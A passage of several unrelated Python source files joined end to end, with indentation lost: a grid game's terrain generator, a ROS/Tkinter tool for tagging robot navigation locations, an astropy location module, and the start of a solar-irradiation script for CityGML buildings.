self.storage[6][4].set_terrain('3_h_w')
self.storage[7][2].set_terrain('3_h_b')
self.storage[7][3].set_terrain('3_h_b2')
self.storage[3][6].set_terrain('3_h_t')
npc = NPC((2,6),'1')
self.add_npc(npc)
def add_monster(self,monster):
self.monsters.append(monster)
def kill_monster(self,monster):
self.monsters.pop(self.monsters.index(monster))
def ret_monsters(self):
return(self.monsters)
def add_npc(self,npc):
self.npcs.append(npc)
def clear_paths(self,ztype):
if(ztype==1):
water=['3','3_1','3_2','3_3','3_4','3_5','3_6','3_7','3_8']
road='2'
bridge='2_1'
elif(ztype==3):
water=['8','8_1','8_2','8_3','8_4','8_5','8_6','8_7','8_8']
road='7'
bridge='10'
elif(ztype==2):
water=['5_1','5_2','5_3','5_4','5_5','5_6','5_7','5_8']
road='5'
bridge='5'
elif(ztype==4):
water=['11']
road='13'
bridge='13'
for i in range(0,self.sizex):
if(((i,4) not in self.vilposes)):
if(self.storage[i][4].get_terrain() in water):
self.storage[i][4].set_terrain(bridge)
else:
self.storage[i][4].set_terrain(road)
if(ztype==4):
self.storage[i][5].set_terrain('12')
for j in range(0,self.sizey):
if(((4,j) not in self.vilposes)):
if(self.storage[4][j].get_terrain() in water and ztype==3):
self.storage[4][j].set_terrain(bridge)
else:
self.storage[4][j].set_terrain(road)
def set_player_start(self):
if(self.vil==1):
self.pposx=4
self.pposy=4
return
while(1):
random.seed()
self.pposx = random.randint(0,self.sizex-1)
self.pposy = random.randint(0,self.sizey-1)
if(self.storage[self.pposx][self.pposy].get_terrain() in self.walkable):
break
self.storage[self.pposx][self.pposy].set_player()
def make_zone(self,zone):
vil = self.vil
if(vil==2):
vil = 0
random.seed()
if(zone==1):
lakes=random.randint(4+vil*3,6+vil*3)
for k in range(0,lakes):
sizex=random.randint(3+vil*3,4+vil*3)
sizey=random.randint(3+vil*3,4+vil*3)
nwpos=(random.randint(0,self.sizex-sizex),random.randint(0,self.sizey-sizey))
for i in range(0,sizex):
for j in range(0,sizey):
if((i+nwpos[0],j+nwpos[1]) not in self.vilposes):
self.storage[i+nwpos[0]][j+nwpos[1]].set_terrain('3')
sizex=self.sizex
sizey=self.sizey
if(self.vil==0):
for i in range(0,sizex):
for j in range(0,sizey):
if(i==0):
self.storage[i][j].set_terrain('1')
if(i==sizex-1):
self.storage[i][j].set_terrain('1')
if(j==0):
self.storage[i][j].set_terrain('1')
if(j==sizey-1):
self.storage[i][j].set_terrain('1')
for i in range(0,sizex):
for j in range(0,sizey):
if(self.storage[i][j].get_terrain()!='3'):
continue
left=self.storage[i-1][j].get_terrain()
top=self.storage[i][j-1].get_terrain()
try:
right=self.storage[i+1][j].get_terrain()
except:
right=left
try:
down=self.storage[i][j+1].get_terrain()
except:
down=top
if(left=='1' and top=='1'):
self.storage[i][j].set_terrain('3_2')
elif(right=='1' and top=='1'):
self.storage[i][j].set_terrain('3_4')
elif(left=='1' and down=='1'):
self.storage[i][j].set_terrain('3_8')
elif(right=='1' and down=='1'):
self.storage[i][j].set_terrain('3_6')
elif(left=='1'):
self.storage[i][j].set_terrain('3_1')
elif(top=='1'):
self.storage[i][j].set_terrain('3_3')
elif(right=='1'):
self.storage[i][j].set_terrain('3_5')
elif(down=='1' or '3_h' in down):
self.storage[i][j].set_terrain('3_7')
if(zone==2):
for i in range(0,self.sizex):
for j in range(0,self.sizey):
self.storage[i][j].set_terrain('5')
if(i==0 and j==0):
self.storage[i][j].set_terrain('5_2')
elif(i==0 and j==self.sizey-1):
self.storage[i][j].set_terrain('5_8')
elif(i==self.sizex-1 and j==0):
self.storage[i][j].set_terrain('5_4')
elif(i==self.sizex-1 and j==self.sizey-1):
self.storage[i][j].set_terrain('5_6')
elif(i==0):
self.storage[i][j].set_terrain('5_1')
elif(j==0):
self.storage[i][j].set_terrain('5_3')
elif(i==self.sizex-1):
self.storage[i][j].set_terrain('5_5')
elif(j==self.sizey-1):
self.storage[i][j].set_terrain('5_7')
obsts=random.randint(3,7)
for i in range(0,obsts):
px=random.randint(1,self.sizex-2)
py=random.randint(1,self.sizey-2)
obst=random.randint(9,10)
self.storage[px][py].set_terrain('5_'+str(obst))
if(zone==3):
for i in range(0,self.sizex):
for j in range(0,self.sizey):
self.storage[i][j].set_terrain('9')
lakes=random.randint(4,6)
for k in range(0,lakes):
sizex=random.randint(3,4)
sizey=random.randint(3,4)
nwpos=(random.randint(0,self.sizex-1-sizex),random.randint(0,self.sizey-1-sizey))
for i in range(0,sizex):
for j in range(0,sizey):
self.storage[i+nwpos[0]][j+nwpos[1]].set_terrain('8')
sizex=self.sizex
sizey=self.sizey
for i in range(0,sizex):
for j in range(0,sizey):
if(i==0):
self.storage[i][j].set_terrain('9')
if(i==sizex-1):
self.storage[i][j].set_terrain('9')
if(j==0):
self.storage[i][j].set_terrain('9')
if(j==sizey-1):
self.storage[i][j].set_terrain('9')
for i in range(0,sizex):
for j in range(0,sizey):
if(self.storage[i][j].get_terrain()!='8'):
continue
left=self.storage[i-1][j].get_terrain()
top=self.storage[i][j-1].get_terrain()
right=self.storage[i+1][j].get_terrain()
down=self.storage[i][j+1].get_terrain()
if(left=='9' and top=='9'):
self.storage[i][j].set_terrain('8_2')
elif(right=='9' and top=='9'):
self.storage[i][j].set_terrain('8_4')
elif(left=='9' and down=='9'):
self.storage[i][j].set_terrain('8_8')
elif(right=='9' and down=='9'):
self.storage[i][j].set_terrain('8_6')
elif(left=='9'):
self.storage[i][j].set_terrain('8_1')
elif(top=='9'):
self.storage[i][j].set_terrain('8_3')
elif(right=='9'):
self.storage[i][j].set_terrain('8_5')
elif(down=='9'):
self.storage[i][j].set_terrain('8_7')
if(zone==4):
sizex=self.sizex
sizey=self.sizey
for i in range(0,sizex):
for j in range(0,sizey):
self.storage[i][j].set_terrain('11')
def print_task(self,task):
if(task=="player"):
self.storage[self.pposx][self.pposy].output_str('pos')
if(task=="out"):
print("No such point on field")
def move_player(self,newx,newy):
self.storage[self.pposx][self.pposy].unset_player()
if(newx<self.sizex and newy<self.sizey):
self.pposx = newx
self.pposy = newy
self.storage[self.pposx][self.pposy].set_player()
else:
self.print_task("out")
def cur_cond(self):
return self.storage
def size(self):
return self.sizex,self.sizey
def terrains(self):
terrains=[]
for i in range(0,self.sizex):
for j in range(0,self.sizey):
if(self.storage[i][j].get_terrain() not in terrains):
terrains.append(self.storage[i][j].get_terrain())
return terrains
| |
#!/usr/bin/env python
import rospy
from std_msgs.msg import String
from Tkinter import *
import Tkinter as tk
#from TkTreectrl import * #To use this terminal: apt-get install tktreectrl
import tkMessageBox as msg
import tf.transformations
from geometry_msgs.msg import PoseStamped
from geometry_msgs.msg import PoseWithCovarianceStamped
from geometry_msgs.msg import PointStamped
import os
def MsgBox(title, text, style):
box = [
msg.showinfo, msg.showwarning, msg.showerror,
msg.askquestion, msg.askyesno, msg.askokcancel, msg.askretrycancel,
];
tk.Tk().withdraw(); #Hide Main Window.
if style in range(7):
return box[style](title, text)
def AddOnClick(event):
global locationName
global latestPose
global latestOrientation
global nameArray
global poseArray
global quaternion
name= locationName.get()
pose= latestPose
orientation= latestOrientation
quaternion=latestQuaternion
if(name!=''and pose!=(0,0,0)and quaternion!=(0,0,0,0)):
locationName.labelText =""
locationName.delete(0, 'end')
nameArray.append(name)
poseArray.append(pose)
orientationArray.append(orientation)
quaternionArray.append(quaternion)
warnLabel.config(text="")
nameList.insert(nameList.size() ,"name: " +name+" "+" pose: (" +str(pose.x)+","+str(pose.y)+","+str(pose.z)+") "+" quaternion: " +str(quaternion))
elif (pose==(0,0,0) or quaternion==(0,0,0,0)):
#print "Please tag a point on the map first."
warnLabel.config(text="Please tag a point on the map.")
elif name=="":
#print "Please type location name"
warnLabel.config(text="Please type location name.")
def deleteOnClick(event):
global nameList
items = nameList.curselection()
pos = 0
for i in items :
idx = int(i) - pos
nameList.delete( idx,idx )
pos = pos + 1
for j in range(idx,(nameArray.__len__()-1)):
nameArray[j]=nameArray[j+1]
poseArray[j]=poseArray[j+1]
orientationArray[j]=orientationArray[j+1]
quaternionArray[j]=quaternionArray[j+1]
nameArray[nameArray.__len__()-1]=None
poseArray[nameArray.__len__()-1]=None
orientationArray[nameArray.__len__()-1]=None
quaternionArray[nameArray.__len__()-1]=None
print "delete "+str(idx)
print nameArray
def openFile(event):
f = open('locationPoint', 'w')
for line in f:
print line
def saveOnClick(event):
# pubDataStaus("updating")
#print __file__
dir = os.path.dirname(__file__)
#print dir
filename = dir+'/locationPoint.txt'
#print filename
##for checking
# if os.path.isfile(filename):
# print "locationPoint.txt "+"exists"
# else:
# print "locationPoint.txtv "+"not exist"
f = open(filename,'w')
# else:
# try:
# f = open('locationPoint.txt','r+') # Trying to create a new file or open one
# except:
# print('new text file error')
f.truncate()
for j in range(0, nameArray.__len__()):
if nameArray[j] is not None:
s = (nameArray[j]+ ","
+str(poseArray[j].x)+","
+str(poseArray[j].y)+","
+str(poseArray[j].z)+","
+str(quaternionArray[j].x)+","
+str(quaternionArray[j].y)+","
+str(quaternionArray[j].z)+","
+str(quaternionArray[j].w)+"\n")
#print s
f.writelines(s)
#print "done"
global filePath
filePath.config(text="File path: "+filename)
f.close()
pubDataStaus(os.path.dirname(__file__)+'/locationPoint.txt')
def loadOnClick(event):
pass
def getPoseData(data):
print "getten"
global latestPose
latestPose = data.pose.pose.position
global latestQuaternion
latestQuaternion = data.pose.pose.orientation
#print("Point Position: [ %f, %f, %f ]"%(latestPose.x, latestPose.y, latestPose.z))
#print("Quat Orientation: [ %f, %f, %f, %f]"%(latestQuaternion.x, latestQuaternion.y, latestQuaternion.z, latestQuaternion.w))
global latestOrientation
latestOrientation = tf.transformations.euler_from_quaternion([latestQuaternion.x, latestQuaternion.y, latestQuaternion.z, latestQuaternion.w])
#print("Euler Angles: %s"%str(latestOrientation))
global poseLabel
global nameList
saveString = ("latest goal position: "+str(latestPose)+"\n Orientation: "+str(latestOrientation)+"\n")
poseLabel.config(text=saveString)
def subscribePose():
rospy.Subscriber('/initialpose', PoseWithCovarianceStamped, getPoseData)
# rospy.Subscriber('/move_base_simple/goal', PoseStamped, getPoseData)
global background
def pubDataStaus(dataStatus):
pub = rospy.Publisher('WPsOK', String, queue_size=10)
pub.publish(dataStatus)
def subscribePoint():
rospy.Subscriber('/clicked_point', PointStamped, printclickpoint)
def printclickpoint(data):
print "clicked_point"
print data.point
def on_closing():
if msg.askokcancel("Warning", "Do you want to quit?"):
background.destroy()
rospy.signal_shutdown("")
nameArray=[]
poseArray=[]
orientationArray=[]
quaternionArray=[]
latestPose=(0,0,0)
latestOrientation=(0,0,0)
latestQuaternion=(0,0,0,0)
background = tk.Tk()
#tk.iconbitmap(r'c:\Python32\DLLs\py.ico') #set icon
background.wm_title("Location Config")
background.geometry('{}x{}'.format(900,800))# window size
background.resizable(width=True, height=True) #window resizable
background.protocol("WM_DELETE_WINDOW", on_closing)
F1=Frame(background, height=60,width=600)
F1.pack()
titleLabel = Label(F1,text="Hints: 1. Press '2D Nav Goal' in RVIZ.\n2. Click the location you want to tag.\n3. Type the name of location below and press 'ADD' \n",justify=LEFT,relief=RIDGE,width=80)
titleLabel.pack()
F2=Frame(background, height=20,width=900)
F2.pack()
poseLabel =Label(F2,text="Click the location you want to tag in RVIZ")
poseLabel.pack()
F3=Frame(background, height=20,width=900)
F3.pack()
nameLabel = Label(F3, text="Location Name")
nameLabel.grid(row=0, column=0)
locationName = Entry(F3, bd =5)
locationName.grid(row=0, column=1)
okBtn = Button(F3, text="ADD")
okBtn.grid(row=0, column=2)
okBtn.bind('<Button-1>', AddOnClick)
warnLabel = Label(F3,text='',fg = "red",bg = "yellow")
warnLabel.grid(row=0, column=3)
F4=Frame(background, height=200,width=600)
F4.pack()
scrollbar = Scrollbar(F4)
scrollbar.pack( side = RIGHT, fill=Y )
nameList =Listbox(F4,relief=RIDGE,width=600,height=30,yscrollcommand = scrollbar.set )
# for line in range(5):
# nameList.insert(END, "Location " + str(line))
nameList.pack( side = LEFT, fill = BOTH )
scrollbar.config( command = nameList.yview )
F5=Frame(background, height=200,width=600)
F5.pack()
deleteBtn = Button(F5, text="DELETE")
deleteBtn.grid(row=0, column=0)
deleteBtn.bind('<Button-1>', deleteOnClick)
filePath = Label(F5,justify=LEFT,width=80,text="FILE PATH:")
filePath.grid(row=0, column=1)
saveBtn = Button(F5, text="SAVE")
saveBtn.grid(row=0, column=2)
saveBtn.bind('<Button-1>', saveOnClick)
saveBtn = Button(F5, text="LOAD")
saveBtn.grid(row=0, column=3)
saveBtn.bind('<Button-1>', loadOnClick)
if __name__ == '__main__':
rospy.init_node('gui', anonymous=False)
rospy.on_shutdown(background.quit)
subscribePose()
subscribePoint()
background.mainloop()
rospy.spin()
| |
"""
An implementation for the core concept location for astronomic spaces
:author: Fenja Kollasch, 06/2017
"""
from coreconcepts import CcLocation
from astropy.coordinates import SkyCoord
from astropy.coordinates import EarthLocation
from astropy.coordinates import ICRS
from astropy.coordinates import AltAz
from astropy.coordinates import BarycentricTrueEcliptic
from astropy.coordinates import Galactic
from astropy.time import Time
from astropy import units as u
from enum import Enum
import math as m
# Types for location
class CRS(Enum):
"""
Celestial Reference Systems
"""
# International celestial reference system. Equivalent to equatorial coordinates
ICRS = ('icrs', 'sosy barycenter')
# Horizontal coordinates. Relative to observer. Often used for observation
HORIZONTAL = ('altaz', 'observer')
# Ecliptic coordinates. Used for objects orbiting the sun
ECLIPTIC = ('barycentrictrueecliptic', 'sosy barycenter')
# Galactic coordinates
GALACTIC = ('galactic', 'sun')
def __init__(self, sys, anchor):
self.sys = sys
self.anchor = anchor
@staticmethod
def get_by_sys(sys):
if sys == 'icrs' or isinstance(sys, ICRS):
return CRS.ICRS
elif sys == 'altaz' or isinstance(sys, AltAz):
return CRS.HORIZONTAL
elif sys == 'barycentrictrueecliptic' or isinstance(sys, BarycentricTrueEcliptic):
return CRS.ECLIPTIC
elif sys == 'galactic' or isinstance(sys, Galactic):
return CRS.GALACTIC
else:
raise ValueError("System {0} not supported".format(sys))
REFPOINTS = {'observer': 'altaz', 'earth': 'altaz', 'sosy barycenter': 'icrs',
'sun': 'ecliptic', 'galactic center': 'galactic'}
class SphericalCoord(CcLocation):
"""
A spherical pair of coordinates specified by a reference frame
"""
def __init__(self, **args):
"""
Wrapping up SkyCoord in a spherical or unitspherical representation
:param args: Arguments forming the SkyCoord. Must have at least a longitude,
a latitude and a frame, or a Skycoord-Object
"""
self.representation = 'spherical'
self.__args = args
# Pop the additional info not related to AstroPy out and save them as attributes
# Apparent magnitude minus absolute magnitude. Type: Float
self.distance_module = args.pop('distance_module', None)
# Parallax as visible from earth. Type: Float
self.parallax = args.pop('parallax', None)
# Observer's position on earth.
self.observer = args.pop('observer', None)
if self.observer:
self.__observer = EarthLocation(lon=self.observer[1] * u.deg, lat=self.observer[0] * u.deg,
height=self.observer[2] * u.m)
# Time this position was observed, depending on the observer's time zone
self.time = args.pop('time', None)
if self.time:
offset = int(self.observer[0] / 15) * u.hour
self.__time = Time(self.time) - offset
if 'skycoord' in args:
self.__coord = args['skycoord']
else:
try:
lon = args.pop('lon')
lat = args.pop('lat')
frame = args.pop('frame')
if frame == 'altaz':
self.__coord = self.__create_horizontal(lon, lat, **args)
else:
self.__coord = self.__create_skycoord(lon, lat, frame, **args)
except KeyError:
raise LocationError("A 2d Position needs a longitude, a latitude and a reference system.")
@property
def lon(self):
return switch_frame(self.frame, lambda c: c.ra.value, lambda c: c.az.value, lambda c: c.lon.value,
lambda c: c.l.value, self.__coord)
@property
def lat(self):
return switch_frame(self.frame, lambda c: c.dec.value, lambda c: c.alt.value, lambda c: c.lat.value,
lambda c: c.b.value, self.__coord)
@property
def frame(self):
return CRS.get_by_sys(self.__coord.frame)
def __eq__(self, other):
return other.lon == self.lon and other.lat == self.lat and other.frame == self.frame
def __hash__(self):
return hash(self.frame) + hash(self.lon + self.lat)
def __create_skycoord(self, lon, lat, frame, **args):
try:
distance = args.pop('distance', distance_to_refpoint(self, CRS.get_by_sys(frame).anchor))
return SkyCoord(((lon + 360) % 360) * u.deg, lat * u.deg, frame=frame,
representation="spherical", distance=distance * u.pc, **args)
except ValueError:
return SkyCoord(((lon + 360) % 360) * u.deg, lat * u.deg, frame=frame,
representation="unitspherical")
def __create_horizontal(self, lon, lat, **args):
if not self.__observer or not self.__time:
raise ValueError("A horizontal representation needs an observer's location and an observation time.")
args['location'] = self.__observer
args['obstime'] = self.__time
return self.__create_skycoord(lon, lat, 'altaz', **args)
def distance(self, ground=None):
if not ground:
try:
return self.__coord.distance
except AttributeError:
return 1
if ground in REFPOINTS:
return distance_to_refpoint(self, ground)
if ground.representation == 'extend':
return ground.distance(self)
if ground.representation != self.representation:
return translate(self, ground.representation).distance(ground)
else:
return self.__coord.separation(ground.__coord)
def is_at(self, ground):
try:
self.change_frame(ground.frame)
return self.lon == ground.lon and self.lat == ground.lat
except ValueError:
return False
def is_in(self, ground):
return self.__coord.get_constellation() == ground.constellation
def is_part(self, ground):
try:
return self in ground.members
except AttributeError:
return False
def is_neighbor(self, ground):
try:
return self.neighborhood == ground.neighborhood
except AttributeError:
return False
def change_frame(self, frame):
"""
Changes the reference frame to the given one
:param frame: A new reference frame
:return:
"""
if frame == 'altaz':
try:
self.__coord = self.__coord.transform_to(AltAz(location=self.__observer, obstime=self.__time))
except AttributeError:
raise LocationError("A horizontal representation needs an observer location and a time.")
elif frame in ['icrs', 'barycentrictrueecliptic', 'galactic']:
self.__coord.transform_to(frame)
else:
raise LocationError("The frame {0} is currently not supported".format(frame))
def make_extend(self, a, b, c):
if self.__coord.representation == 'spherical':
return AstroExtent(self, a, b, c)
else:
raise LocationError("A distance is necessary to extend a 2dPosition.")
def voronoi_set(self, points):
"""
Calculate the voronoi space of this location
:param points: A set of points
:return: The voronoi space based on a set of points
"""
voronoi = []
for p in points:
nearest = True
for q in (points - p):
if p.distance(self) > p.distance(q):
nearest = False
break
if nearest:
voronoi.append(p)
return AstroExtent(self, voronoi)
def translate_to_cartesian(self):
self.__coord.representation = 'cartesian'
return CartesianCoord(skycoord=self.__coord)
def translate_to_distance(self):
if self.__coord.representation == 'unitspherical':
raise LocationError("No distance available.")
else:
return Distance(self.__coord.distance, self.frame.anchor, **self.__args)
class CartesianCoord(CcLocation):
def __init__(self, **args):
"""
AstroPosition in three dimensional cartesian coordinates
:param args: Arguments for coordinate creation. Contains at least x,y,z and
an origin which is either a reference point or coordinates
"""
self.representation = 'cartesian'
self.__args = args
if 'skycoord' in args:
self.__coord = args['skycoord']
else:
try:
x = args.pop('x')
y = args.pop('y')
z = args.pop('z')
origin = args.pop('origin')
if origin in REFPOINTS:
self.__coord = SkyCoord(x, y, z, representation='cartesian', frame=REFPOINTS[origin], **args)
else:
self.__coord = SkyCoord(x - self.origin.__coord.x, y - self.origin.__coord.y,
z - self.origin.__coord.z, frame=origin.__coord.frame,
representation='cartesian', **args)
self.origin = origin
except KeyError:
raise LocationError("A 3d position needs at least three coordinates and an origin")
@property
def x(self):
return self.__coord.x + self.origin.__coord.x
@property
def y(self):
return self.__coord.y + self.origin.__coord.y
@property
def z(self):
return self.__coord.z + self.origin.__coord.z
def distance(self, ground=None):
if not ground:
try:
return self.__coord.separation_3d(self.origin)
except AttributeError:
return 1
if ground.representation == 'extend':
return ground.distance(self)
if ground.representation != self.representation:
return translate(self, ground.representation).distance(ground)
else:
return self.__coord.separation_3d(ground.__coord)
def is_at(self, ground):
if ground.representation == 'extend':
return ground.is_at(self)
try:
if self.origin != ground.origin:
self.change_origin(ground.origin)
return self.x == ground.x and self.y == ground.y and self.z == ground.z
except AttributeError:
return False
def is_in(self, ground):
try:
self.change_origin(ground.footprint)
if ((self.x / ground.a) ** 2 + (self.y / ground.b) ** 2 + (self.z / ground.c) ** 2) <= 1:
return True
for subspace in ground.members:
if self.is_in(subspace):
return True
return False
except AttributeError:
return False
def is_part(self, ground):
try:
return self in ground.members
except AttributeError:
return False
def is_neighbor(self, ground):
try:
return self.neighborhood == ground.neighborhood
except AttributeError:
return False
def change_origin(self, origin):
if origin in REFPOINTS:
self.__coord.transform_to(REFPOINTS[origin])
self.origin = origin
else:
self.__coord.transform_to(origin.__coord.frame)
self.__coord = SkyCoord(self.__coord.x - origin.__coord.x, self.__coord.y - origin.__coord.y,
self.__coord.z - origin.__coord.z, frame=origin.__coord.frame,
representation='cartesian', **self.__args)
self.origin = origin
def make_extend(self, a, b, c):
return AstroExtent(self, a, b, c)
def translate_to_spherical(self):
self.__coord.representation = 'spherical'
return SphericalCoord(skycoord=self.__coord)
def translate_to_distance(self):
if self.__coord.representation == 'unitspherical':
raise LocationError("No distance available.")
else:
return Distance(self.__coord.distance, self.origin, **self.__args)
class Distance(CcLocation):
def __init__(self, distance, reference, **args):
"""
A location described by the distance to a reference object
"""
self.representation = 'distance'
self.distance = distance
self.reference = reference
self.__args = args
for arg in args:
self.__setattr__(arg, args[arg])
def __lt__(self, other):
return self.distance < other.distance
def __le__(self, other):
return self.distance <= other.distance
def __eq__(self, other):
return self.distance == other.distance and self.reference == other.reference
def __ge__(self, other):
return self.distance >= other.distance
def __gt__(self, other):
return self.distance > other.distance
def __hash__(self):
return hash(self.reference + str(self.distance))
def __str__(self):
return "{a} kpc from {b} away".format(a=self.distance, b=self.reference)
def distance(self, ground=None):
if not ground or ground == self.reference:
return self.distance
try:
# If possible, calculate spherical distance with harvesine formular
phi = 2*self.distance * m.asin(m.sqrt(m.sin((ground.lat - self.lat)/2)**2 +
m.cos(self.lat) * m.cos(ground.lat) *
m.sin((ground.lon - self.lon)/2)**2))
d = ground.distance(self.reference)
# Then use pythagoras to get the distance between the objects
return m.sqrt(self.distance**2 + d**2 - 2 * self.distance * d * m.cos(phi))
except AttributeError:
raise LocationError("The distance between these two locations can't be computed.")
def is_at(self, ground):
if ground.representation == 'distance':
return self.distance == ground.distance
return False
def is_in(self, ground):
if ground.representation == 'distance':
return self.distance <= ground.distance
try:
self.distance <= ground.half_axis
except AttributeError:
return False
def is_part(self, ground):
try:
return self in ground.members
except AttributeError:
return False
def make_extend(self, a, b):
try:
return AstroExtent(self.reference, self.distance, a, b)
except AttributeError:
raise LocationError("Can't make an extend from this distance. There are no coordinates for the footprint.")
def is_neighbor(self, ground):
try:
return self.neighborhood == ground.neighborhood
except AttributeError:
return False
def translate_to_spherical(self):
try:
return SphericalCoord(**self.__args)
except LocationError:
raise LocationError("The distance holds not enough arguments to create a 2d position")
def translate_to_cartesian(self):
try:
return CartesianCoord(**self.__args)
except LocationError:
raise LocationError("The distance holds not enough arguments to create a 3d position")
class AstroExtent(CcLocation):
def __init__(self, footprint, members=[], constellation=None, a=0, b=0, c=0):
"""
An area based on a three dimensional footprint position
Can include other locations.
May be bounded (usually as an ellipsoid space)
:param footprint: Footprint position. Can be any kind of location except distance
:param members: Other locations that are part of this location
:param constellation: The boundary of this extend is defined by this constellation
:param a: radius 1
:param b: radius 2
:param c: radius 3
"""
self.representation = 'extend'
self.footprint = footprint
self.members = members
self.constellation = constellation
self.a = a
self.b = b
self.c = c
@property
def half_axis(self):
if self.a >= self.b and self.a >= self.c:
return self.a
elif self.b >= self.a and self.b >= self.c:
return self.b
else:
return self.c
def add_member(self, member):
self.members.append(member)
member.neighborhood = self
def distance(self, ground):
return self.footprint.distance(ground)
def is_at(self, ground):
return self.footprint.is_at(ground)
def is_in(self, ground):
return self.footprint.is_in(ground)
def is_part(self, ground):
try:
return self in ground.members
except AttributeError:
return False
def is_neighbor(self, ground):
try:
return self.neighborhood == ground.neighborhood
except AttributeError:
return False
def distance_to_refpoint(self, refpoint):
return self.footprint.distance_to_refpoint(refpoint)
# Module functions for location
def locate(relation, ground, figure, **args):
"""
Locate an object relative to another phenomena
:param relation: The relation that indicates the location
:param ground: The phenomena that is used to ground the object
:param figure: The object that is being located
:param args: Additional information about the location
:return: A location such as a coordinate, a distance or an extent
"""
# Todo: Not yet generic enough
if relation == 'ccs':
return SphericalCoord(lon=float(figure.property('lon')), lat=float(figure.property('lat')),
frame=ground, **args)
elif relation == 'cartesian':
return CartesianCoord(x=float(figure.property('x')), y=float(figure.property('y')),
z=float(figure.property('z')), origin=ground, **args)
elif relation == 'distance':
return Distance(figure.distance, ground, **args)
elif relation == 'extend':
try:
members = figure.property('members')
except AttributeError:
members = []
try:
constellation = figure.property('constellation')
except AttributeError:
constellation = []
return AstroExtent(ground, members=members, constellation=constellation)
else:
raise LocationError("The relation '{0}' is currently not supported.".format(relation))
def resolve(relation, figure, ground):
"""
Resolves the given relation between two locations.
:param relation: The relation that needs to be resolved.
:param figure: The first location
:param ground: Another location
:return: The result of the relation between them
"""
if callable(relation):
return relation(figure, ground)
elif relation == 'distance':
return figure.distance(ground)
elif relation == 'is_at':
return figure.is_at(ground)
elif relation == 'is_in':
return figure.is_in(ground)
elif relation == 'is_part':
return figure.is_part(ground)
elif relation == 'is_neighbor':
return figure.is_neighbor(ground)
else:
return LocationError("The relation {0} is currently not supported".format(relation))
def translate(location, representation):
"""
Translate the given location into an other representation
:param location: A location
:param representation: The new representation
:return: The translated location
"""
if location.representation == representation:
return location
if representation == "spherical":
return location.translate_to_spherical()
elif representation == "cartesian":
return location.translate_to_cartesian()
elif representation == "distance":
return location.translate_to_distance()
elif representation == "extend":
raise LocationError("No instant transformation into extend. Use make_extend instead.")
else:
raise LocationError("The representation '{0}' is currently not supported.".format(representation))
def distance_to_refpoint(location, refpoint):
"""
Calculates the distance to common astronomic reference points
:param location: The location
:param refpoint: The reference point
:return: the distance in parsec
"""
# Todo: Just rudimentary implemented. Not 100% correct yet
return switch_refpoint(refpoint, distance_to_earth, distance_to_earth,
distance_to_sun, distance_to_sun, distance_to_sun, location)
def distance_to_earth(location):
"""
Calculates the distance to earth
:param location: The location
:return: Distance to earth in parsec
"""
try:
if location.distance_module is not None:
return 10 ** ((location.distance_module + 5) / 5)
elif location.parallax is not None:
return 1 / location.parallax
else:
raise ValueError("There is no way to find out the distance to earth for this location.")
except AttributeError:
raise ValueError("There is no way to find out the distance to earth for this location.")
def distance_to_sun(location):
"""
Calculates the distance to the sun
:param location: The location
:return: Distance to sun in parsec
"""
return m.sqrt(0.000004848 ** 2 + distance_to_earth(location) ** 2)
def switch_frame(frame, f_icrs, f_hor, f_ecl, f_gal, *params):
"""
Differ between the reference frames
:param frame: The reference frame that is switched
:param f_icrs: Transformation function for ICRS
:param f_hor: Transformation function for horizontal frame
:param f_ecl: Transformation function for ecliptic frame
:param f_gal: Transformation function for galactic frame
:param params: Parameters for the functions
:return: The expected value returned by the functions depending on the reference frame
"""
if frame == CRS.ICRS:
return f_icrs(*params)
elif frame == CRS.HORIZONTAL:
return f_hor(*params)
elif frame == CRS.ECLIPTIC:
return f_ecl(*params)
elif frame == CRS.GALACTIC:
return f_gal(*params)
else:
raise LocationError("The reference frame {0} is currently not supported. I'm sorry".format(frame))
def switch_refpoint(refpoint, f_obs, f_earth, f_bar, f_sun, f_gal, *params):
if refpoint == 'observer':
return f_obs(*params)
elif refpoint == 'earth':
return f_earth(*params)
elif refpoint == 'sosy barycenter':
return f_bar(*params)
elif refpoint == 'sun':
return f_sun(*params)
elif refpoint == 'galactic center':
return f_gal(*params)
else:
raise ValueError("Unknown reference point: {0}".format(refpoint))
"""
Exceptions
"""
class LocationError(Exception):
def __init__(self, message):
super(LocationError, self).__init__(message)
| |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# The MIT License (MIT)
# This code is part of the Solar3Dcity package
# Copyright (c) 2015
# Filip Biljecki
# Delft University of Technology
# fbiljecki@gmail.com
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import polygon3dmodule
import markup3dmodule
from lxml import etree
import irr
import argparse
import glob
import os
import pickle
from scipy import interpolate
import numpy as np
import math
#-- Name spaces
ns_citygml = "http://www.opengis.net/citygml/2.0"
ns_gml = "http://www.opengis.net/gml"
ns_bldg = "http://www.opengis.net/citygml/building/2.0"
ns_xsi = "http://www.w3.org/2001/XMLSchema-instance"
ns_xAL = "urn:oasis:names:tc:ciq:xsdschema:xAL:2.0"
ns_xlink = "http://www.w3.org/1999/xlink"
ns_dem = "http://www.opengis.net/citygml/relief/2.0"
nsmap = {
None : ns_citygml,
'gml': ns_gml,
'bldg': ns_bldg,
'xsi' : ns_xsi,
'xAL' : ns_xAL,
'xlink' : ns_xlink,
'dem' : ns_dem
}
#-- ARGUMENTS
# -i -- input directory (it will read ALL CityGML files in a directory)
# -o -- output directory (it will output the enriched CityGMLs in that directory with the naming convention Delft.gml becomes Delft-solar.gml)
# -f -- factors (precomputed tilt-orientation-factors)
PARSER = argparse.ArgumentParser(description='Calculate the yearly solar irradiation of roof surfaces.')
PARSER.add_argument('-i', '--directory',
help='Directory containing CityGML file(s).', required=True)
PARSER.add_argument('-o', '--results',
